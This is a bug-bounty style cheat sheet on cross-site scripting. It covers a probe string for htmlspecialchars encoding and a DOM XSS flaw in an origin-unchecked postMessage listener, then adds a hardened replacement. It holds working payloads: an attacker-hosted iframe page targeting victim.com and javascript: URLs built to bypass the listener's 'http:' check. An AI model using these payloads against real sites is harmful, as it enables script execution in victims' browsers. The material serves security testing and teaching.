XSS
Encode by htmlspecialchars
Try this payload first to identify which characters get encoded:
!@#$%^&*()}{\'\"|?><`~}
Tips:
Look for other places where the input is reflected in the HTML, for example inside a <script> tag or elsewhere.
Dom XSS
EventListener Message
Look for code like this in the JavaScript:
<script>
window.addEventListener('message', function(e) {
    var url = e.data;
    if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
        location.href = url;
        alert();
    }
}, false);
</script>
A 'message' event listener means the web application accepts messages sent with postMessage. This listener does not check e.origin, and it only tests whether the string contains http: or https: before assigning it to location.href, so any window that embeds the page in an iframe can send it a message via postMessage.
Host a page containing this payload:
<html>
<h1>Test</h1>
<iframe src=https://victim.com/ onload="this.contentWindow.postMessage('javascript:print();alert(`http:`)','*')"></iframe>
</html>
Other payloads that work when the value ends up in location.href (each contains the substring http: so it passes the check):
javascript:print()//http:
javascript:print();alert(`http:`)
javascript:print();var x=`http:`;
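For comparison, here is the listener from above beside a hardened version. This is an added example, not code from the original page; the allowed sender origin and the example hostnames are assumed values.

```javascript
// Added example (not from the original page). The page's listener only checks
// for the substring "http:" / "https:", so a "javascript:" URL that contains
// that substring passes and is assigned to location.href. The hardened version
// checks event.origin against an allow-list and parses the URL with new URL()
// instead of searching it for a substring.
const ALLOWED_ORIGIN = 'https://trusted.example'; // assumed allowed sender origin

// Reproduces the vulnerable check from the page's listener.
function weakAccepts(url) {
  return url.indexOf('http:') > -1 || url.indexOf('https:') > -1;
}

// Hardened check: returns the normalised URL to navigate to, or null to drop the message.
function resolveRedirect(data, origin, allowedOrigin = ALLOWED_ORIGIN) {
  if (origin !== allowedOrigin) return null;   // message came from an unexpected window
  if (typeof data !== 'string') return null;   // postMessage can carry any structured value
  let parsed;
  try {
    parsed = new URL(data);                    // parse the URL; relative or malformed input throws
  } catch (e) {
    return null;
  }
  // Only real web URLs may be navigated to; javascript:, data:, etc. are rejected.
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  return parsed.href;
}

// Drop-in replacement for the page's listener; `win` is the window to attach it to.
function installHardenedListener(win, allowedOrigin = ALLOWED_ORIGIN) {
  win.addEventListener('message', function (e) {
    const target = resolveRedirect(e.data, e.origin, allowedOrigin);
    if (target !== null) win.location.href = target;
  }, false);
}

// Payloads from the page, constructed here as test input for the two checks.
const PAYLOADS = ['javascript:print()//http:', 'javascript:print();alert(`http:`)'];
```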
Reference:
https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md